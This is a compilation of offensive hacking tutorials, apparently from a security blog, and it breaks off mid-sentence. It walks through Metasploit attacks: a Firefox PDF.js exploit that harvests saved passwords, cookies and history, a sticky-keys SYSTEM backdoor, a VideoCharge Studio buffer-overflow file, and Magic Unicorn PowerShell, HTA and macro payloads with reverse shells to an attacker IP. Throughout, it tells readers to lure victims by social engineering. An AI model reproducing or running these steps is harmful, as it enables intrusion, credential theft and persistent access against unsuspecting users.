Hack Remote PC using Firefox PDF.js Privileged Javascript Injection

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets

Firefox 35-36

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_pdfjs_privilege_escalation

msf exploit (firefox_pdfjs_privilege_escalation)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_pdfjs_privilege_escalation)>set lhost 192.168.0.121 (IP of Local Host)

msf exploit (firefox_pdfjs_privilege_escalation)>set srvhost 192.168.0.121

msf exploit (firefox_pdfjs_privilege_escalation)>set uripath /

msf exploit (firefox_pdfjs_privilege_escalation)>exploit

Now an URL you should give to your victim http://192.168.0.121:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.121:8080).  It will show the page like given below .And when victim will manually click on the click here option.

Now a session will be opened as shown below.

If you want to gather the user passwords stored through Firefox Browser. Use the following commands.

Now type use post/firefox/gather/passwords

msf exploit (passwords)>set session 1

msf exploit (passwords)>exploit

After running the privileged JavaScript, it will show the path where passwords will be saved.

Now open the file and get the user names and passwords stored through Firefox browser.

To see the history of the Firefox, run the below given exploit.

Now type use post/firefox/gather/history

msf exploit (history)>set session 1

msf exploit (history)>exploit

After running this exploit, go to the path where history entries are stored. It will show us the URLs visited by the victim.

To gather information about the browser cookies, run the given below exploit .

Now type use post/firefox/gather/cookies

msf exploit (cookies)>set session 1

msf exploit (cookies)>exploit  

The above exploit will save all cookies in the specified folder. Open the folder and click on cookies file.It will show us the cookies information.

Windows 7 Sticky Key Hack Attack using Metasploit

Today we will learn how extract login credentials from a victim, who is running Windows System. Using this technique, we can see the Credentials in plain text.

Table of Content:

•                 Introduction to sticky_keys module

•                 Achieve Meterpreter on Remote System

•                 Using sticky_keys module

Requirements:

•                 Attacker: Kali Linux

•                 Targets: Windows 7

Introduction to sticky_keys module

This module makes it conceivable to apply the 'sticky keys' hack to a session with proper rights. The hack gives a way to get a SYSTEM shell utilizing UI-level communication at an RDP login screen or by means of a UAC affirmation discourse.

The module adjusts the Debug library setting for certain executables. The module choices take into consideration this hack to be connected to:

·        SETHC (sethc.exe is invoked when SHIFT is pressed 5 times)

·        UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U)

·        OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard)

·        DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).

The hack can be included utilizing the ADD activity and expelled with the REMOVE activity. Custom payloads and doubles can be kept running as a component of this endeavor, however, should be physically transferred to the objective before running the module. Naturally, a SYSTEM order brief is introduced utilizing the vault strategy if this module is kept running without changing any parameters.

Achieve Meterpreter on Remote System

Open Kali Linux terminal and type msfconsole in order to load Metasploit framework.  Now we need to compromise victim’s machine once to achieve any type of session either meterpreter or shell and to do so we can read our previous article from here.

Using sticky_keys module

After getting meterpreter on the remote system, now time to use the post exploitation module. But this can’t be done from the meterpreter shell. So, we will use background command in meterpreter session or “Ctrl + z” shortcut to keep the session in background. Now follow the steps shown in the image to use the sticky_keys post exploitation module.

use post/windows/manage/sticky_keys

set session 5

exploit

This will use registry_createkey  command  to edit the Registry on the remote system and replace the sethc.exe  with the cmd.exe. So the next time when we invoke the sticky keys, instead of getting the sticky keys prompt we will get an Administrator Command Prompt. Good thing about sticky keys is that it can be invoked on the Login Screen without entering password. In the similar way it is shown in the given image.

Hack Remote Windows PC using Video Charge Studio Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.

Exploit Targets

VideoCharge Studio 2.12.3.685

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/videocharge_studio

msf exploit (videocharge_studio)>set payload windows/meterpreter/reverse_tcp

msf exploit (videocharge_studio)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (videocharge_studio)>exploit

After we successfully generate the malicious vsc File, it will stored on your local computer

/root/.msf4/local/msf.vsc

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7

exploit

Now send your msf.vsc files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Magic Unicorn - PowerShell Downgrade Attack and Exploitation tool

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injects shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Table of Content

·         Powershell Attack Instruction

·         HTA Attack Instruction

·         Macro Attack Instruction

 Download the unicorn from git repository:

git clone https://github.com/trustedsec/unicorn.git

Once downloaded, go in the directory and run unicorn with the following command to see all the possible methods.

./unicorn.py

POWERSHELL ATTACK INSTRUCTIONS

First we will try the reverse_tcp payload. As we can see in the main menu all the commands are already written. We just need to replace the IP with our IP.

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444

Now this will give us two files. One is a text file named “powershell_attack.txt” which has the powershell code that will be run in the victim’s machine using social engineering and the other is “unicorn.rc” which is a custom metasploit file that will automatically set all the parameters and start a listener.

These files will be saved in the directory where unicorn was cloned. Powershell_attack.txt holds the malicious code and when the victim will execute that code in his command prompt, the attacker will get reverse connection of his machine.

Now let’s set up a listener first. We need to run the metasploit “unicorn.rc” file using the following command:

msfconsole -r unicorn.rc

We see a session was obtained in the meterpreter. It was because the powershell code was executed in the victim’s command shell. It would have looked something like this:

HTA ATTACK INSTRUCTIONS

For our next attack, we will be using an hta payload.

python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 4455 hta

Now convert your IP in bitly URL form and send to victim and then wait for the user to click on the “launcher.hta” file which could be done using social engineering easily.

So, we set up a metasploit listener next using the RC file and wait for user to click on the hta payload.

msfconsole -r unicorn.rc

As soon as he hit the file, we received a meterpreter session.

We checked the system info using sysinfo command.

MACRO ATTACK INSTRUCTIONS

Now for the third and final payload for this tutorial, we set hands on our beloved macros.

python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 443 macro

This again creates a text file and an rc file with the same name and on the same destination.

To enable developed mode there are various methods depending upon your version of MS office.

As for a generic approach, let’s say you enabled it like:

File->properties->ribbons->developer mode

You will see an extra tab labeled developer once it gets enabled.

As for the attack, go to developer->macros and create a new macro named “Auto_Open”

Simply paste the contents from “powershell_attack.txt” to this xlsx module and save it.

As soon as you click run (little green icon on the top), it will give you an error! Don’t worry! You want that error. It is supposed to happen.

Soon after the error on the user screen, we would have obtained a session successfully in meterpreter!

Use sysinfo double check our successful exploitation using un